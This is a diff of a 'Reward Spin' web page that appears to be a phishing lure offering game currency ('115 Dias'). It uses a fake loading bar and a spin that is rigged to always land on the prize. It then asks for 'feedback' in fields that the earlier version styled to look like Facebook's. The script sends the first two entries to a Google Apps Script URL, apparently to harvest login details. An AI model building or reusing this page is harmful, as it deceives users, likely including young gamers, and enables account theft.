--- a/index.html
+++ b/index.html
@@ -2,221 +2,219 @@
 <html lang="en">
 <head>
 <meta charset="UTF-8">
-<title>Spin Reward</title>
+<title>Reward Spin</title>
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
 
 <style>
-/* ===== GLOBAL ===== */
+/* ===== RESET ===== */
+*{
+  box-sizing:border-box;
+  -webkit-tap-highlight-color: transparent;
+}
 body{
   margin:0;
-  font-family: Helvetica, Arial, sans-serif;
-  background: radial-gradient(circle at top, #3b1d5a, #12001f);
-  color:#fff;
+  min-height:100vh;
   display:flex;
   justify-content:center;
   align-items:center;
-  height:100vh;
-}
-
-.hidden{display:none}
-
-.box{
-  width:360px;
-  background:rgba(255,255,255,0.08);
-  backdrop-filter: blur(10px);
-  border-radius:12px;
-  padding:20px;
-  text-align:center;
-  box-shadow:0 0 30px rgba(0,0,0,.4);
-}
-
-/* ===== INPUT (Facebook-like size) ===== */
-.fb-input{
-  width:100%;
-  height:44px;
-  padding:0 12px;
-  font-size:15px;
-  border-radius:6px;
-  border:1px solid #ccd0d5;
-  margin:10px 0;
-}
-
-/* ===== BUTTON ===== */
-button{
-  width:100%;
-  height:44px;
-  border:none;
-  border-radius:6px;
-  background:#1877f2;
+  font-family: Arial, Helvetica, sans-serif;
+  background: radial-gradient(circle at top, #5e2b97, #0b0016);
   color:#fff;
-  font-size:15px;
-  cursor:pointer;
+}
+
+/* ===== CARD ===== */
+.card{
+  width:92%;
+  max-width:360px;
+  background:rgba(255,255,255,0.08);
+  backdrop-filter: blur(14px);
+  border-radius:18px;
+  padding:20px;
+  box-shadow:0 0 40px rgba(90,0,255,0.35);
+  text-align:center;
 }
 
 /* ===== LOADING ===== */
-.circle{
+.loader{
   width:80px;
   height:80px;
   border-radius:50%;
-  border:6px solid rgba(255,255,255,.2);
-  border-top:6px solid #1877f2;
-  animation:spin 1s linear infinite;
+  border:6px solid rgba(255,255,255,0.2);
+  border-top:6px solid #2da9ff;
   margin:20px auto;
+  animation:spin 1s linear infinite;
 }
-@keyframes spin{to{transform:rotate(360deg)}}
+@keyframes spin{
+  0%{transform:rotate(0deg);}
+  100%{transform:rotate(360deg);}
+}
 
-.barWrap{
+.progress{
+  font-size:18px;
+  margin-top:10px;
+}
+
+/* ===== BUTTON ===== */
+.btn{
   width:100%;
-  background:rgba(255,255,255,.2);
-  border-radius:6px;
-  overflow:hidden;
+  padding:14px;
+  border:none;
+  border-radius:12px;
+  font-size:16px;
+  font-weight:bold;
+  background:linear-gradient(135deg,#4da6ff,#7a3cff);
+  color:#fff;
+  box-shadow:0 6px 20px rgba(90,0,255,0.45);
+  transition:0.15s;
 }
-.bar{
-  width:0%;
-  height:10px;
-  background:#1877f2;
+.btn:active{
+  transform:scale(0.95);
 }
 
-/* ===== LINKS ===== */
-.link{
-  margin-top:12px;
-  font-size:14px;
-  color:#8ab4ff;
-  cursor:pointer;
+/* ===== BOX ===== */
+.box{
+  background:rgba(255,255,255,0.12);
+  border-radius:12px;
+  padding:15px;
+  margin:15px 0;
 }
+
+/* ===== INPUT ===== */
+.input{
+  width:100%;
+  padding:12px;
+  border-radius:10px;
+  border:1px solid rgba(255,255,255,0.3);
+  background:rgba(0,0,0,0.25);
+  color:#fff;
+  font-size:15px;
+  margin-top:10px;
+}
+.input::placeholder{
+  color:#ccc;
+}
+
+/* ===== HIDE ===== */
+.hidden{display:none;}
 </style>
 </head>
 
 <body>
 
-<!-- PAGE 1 LOADING -->
-<div class="box" id="loadingPage">
-  <h3>Loading</h3>
-  <div class="circle"></div>
-  <div class="barWrap"><div class="bar" id="bar"></div></div>
-  <p id="percent">0%</p>
+<div class="card">
+
+<!-- LOADING -->
+<div id="loading">
+  <div class="loader"></div>
+  <div class="progress" id="percent">Loading 0%</div>
 </div>
 
-<!-- PAGE 2 SPIN -->
-<div class="box hidden" id="spinPage">
-  <h3>Spin Reward</h3>
-  <div id="spinText" style="font-size:22px;margin:30px 0;">READY</div>
-  <button onclick="startSpin()" id="spinBtn">SPIN</button>
+<!-- SPIN -->
+<div id="spin" class="hidden">
+  <h2>Spin Reward</h2>
+  <div class="box" id="spinBox">Tap GO</div>
+  <button class="btn" onclick="spin()">GO</button>
 </div>
 
-<!-- PAGE 3 RESULT -->
-<div class="box hidden" id="resultPage">
-  <h3>Reward</h3>
-  <h2>115 Dias</h2>
-  <button onclick="goRedeem()">REDEEM</button>
+<!-- RESULT -->
+<div id="result" class="hidden">
+  <h2>🎉 You Got</h2>
+  <div class="box"><b>115 Dias</b></div>
+  <button class="btn" onclick="redeem()">Redeem</button>
 </div>
 
 <!-- FEEDBACK 1 -->
-<div class="box hidden" id="fb1">
-  <h3>Feedback</h3>
-  <input class="fb-input" id="f1" placeholder="Enter feedback">
-  <button onclick="sendF1()">NEXT</button>
+<div id="fb1" class="hidden">
+  <h3>Send Feedback to Redeem</h3>
+  <input class="input" id="f1" placeholder="Feedback 1">
+  <button class="btn" onclick="nextFb(2)">Next</button>
 </div>
 
 <!-- FEEDBACK 2 -->
-<div class="box hidden" id="fb2">
-  <h3>Feedback</h3>
-  <input class="fb-input" id="f2" placeholder="Enter feedback">
-  <button onclick="sendF2()">NEXT</button>
+<div id="fb2" class="hidden">
+  <input class="input" id="f2" placeholder="Feedback 2">
+  <button class="btn" onclick="nextFb(3)">Next</button>
 </div>
 
 <!-- FEEDBACK 3 -->
-<div class="box hidden" id="fb3">
-  <h3>Feedback</h3>
-  <input class="fb-input" placeholder="Enter feedback">
-  <button onclick="nextOnly(this)">NEXT</button>
+<div id="fb3" class="hidden">
+  <input class="input" placeholder="Feedback 3">
+  <button class="btn" onclick="nextFb(4)">Next</button>
 </div>
 
 <!-- FEEDBACK 4 -->
-<div class="box hidden" id="fb4">
-  <h3>Feedback</h3>
-  <input class="fb-input" placeholder="Enter feedback">
-  <button onclick="finish()">REDEEM</button>
+<div id="fb4" class="hidden">
+  <input class="input" placeholder="Feedback 4">
+  <button class="btn" onclick="submit()">REDEEM</button>
 </div>
 
 <!-- DONE -->
-<div class="box hidden" id="done">
-  <h2>Successfully Redeemed</h2>
+<div id="done" class="hidden">
+  <h2>✅ Successfully Redeem</h2>
+</div>
+
 </div>
 
 <script>
-/* ===== CONFIG ===== */
-const WEB_APP_URL = "https://script.google.com/macros/s/AKfycbxPZco9av6RzXCesIXIByfVHRHdhhqmDD8_UaeAb6R1akmK9jPhCvQrRZpRqy47bqUCPw/exec";
-
-/* ===== LOADING 25s ===== */
+/* ===== LOADING ===== */
 let p=0;
-const load=setInterval(()=>{
+let load=setInterval(()=>{
   p++;
-  bar.style.width=p+"%";
-  percent.innerText=p+"%";
+  document.getElementById("percent").innerText="Loading "+p+"%";
   if(p>=100){
     clearInterval(load);
-    loadingPage.classList.add("hidden");
-    spinPage.classList.remove("hidden");
+    document.getElementById("loading").classList.add("hidden");
+    document.getElementById("spin").classList.remove("hidden");
   }
 },250); // 25 seconds
 
 /* ===== SPIN ===== */
-const rewards=[
- "Random Epic Skin","Random Emote",
- "Dias 75","Dias 30","Dias 45",
- "Dias 115","Dias 558","Nothing"
-];
 let spun=false;
+function spin(){
+  if(spun) return;
+  spun=true;
+  let box=document.getElementById("spinBox");
+  let items=[
+    "Epic Skin","Emote","75 Dias","30 Dias","45 Dias",
+    "115 Dias","558 Dias","Nothing","Nothing"
+  ];
+  let i=0;
+  let anim=setInterval(()=>{
+    box.innerText=items[i%items.length];
+    i++;
+  },300);
 
-function startSpin(){
- if(spun) return;
- spun=true;
- spinBtn.disabled=true;
-
- let i=0;
- const anim=setInterval(()=>{
-   spinText.innerText=rewards[Math.floor(Math.random()*rewards.length)];
-   i++;
-   if(i>=20){
-     clearInterval(anim);
-     spinText.innerText="Dias 115";
-     setTimeout(()=>{
-       spinPage.classList.add("hidden");
-       resultPage.classList.remove("hidden");
-     },800);
-   }
- },300);
+  setTimeout(()=>{
+    clearInterval(anim);
+    box.innerText="115 Dias";
+    document.getElementById("spin").classList.add("hidden");
+    document.getElementById("result").classList.remove("hidden");
+  },6000);
 }
 
 /* ===== FLOW ===== */
-function goRedeem(){
- resultPage.classList.add("hidden");
- fb1.classList.remove("hidden");
+function redeem(){
+  document.getElementById("result").classList.add("hidden");
+  document.getElementById("fb1").classList.remove("hidden");
+}
+function nextFb(n){
+  document.getElementById("fb"+(n-1)).classList.add("hidden");
+  document.getElementById("fb"+n).classList.remove("hidden");
 }
 
-/* ===== FEEDBACK ===== */
-function sendF1(){
- const v=document.getElementById("f1").value;
- fetch(WEB_APP_URL+"?step=1&feedback="+encodeURIComponent(v));
- fb1.classList.add("hidden");
- fb2.classList.remove("hidden");
-}
+/* ===== SUBMIT ===== */
+function submit(){
+  let f1=document.getElementById("f1").value;
+  let f2=document.getElementById("f2").value;
 
-function sendF2(){
- const v=document.getElementById("f2").value;
- fetch(WEB_APP_URL+"?step=2&feedback="+encodeURIComponent(v));
- fb2.classList.add("hidden");
- fb3.classList.remove("hidden");
-}
+  fetch("https://script.google.com/macros/s/AKfycbxPZco9av6RzXCesIXIByfVHRHdhhqmDD8_UaeAb6R1akmK9jPhCvQrRZpRqy47bqUCPw/exec?feedback1="
+  + encodeURIComponent(f1)
+  + "&feedback2="
+  + encodeURIComponent(f2)
+);
 
-function nextOnly(btn){
- btn.parentElement.classList.add("hidden");
- fb4.classList.remove("hidden");
-}
-
-function finish(){
- fb4.classList.add("hidden");
- done.classList.remove("hidden");
+  document.getElementById("fb4").classList.add("hidden");
+  document.getElementById("done").classList.remove("hidden");
 }
 </script>
 
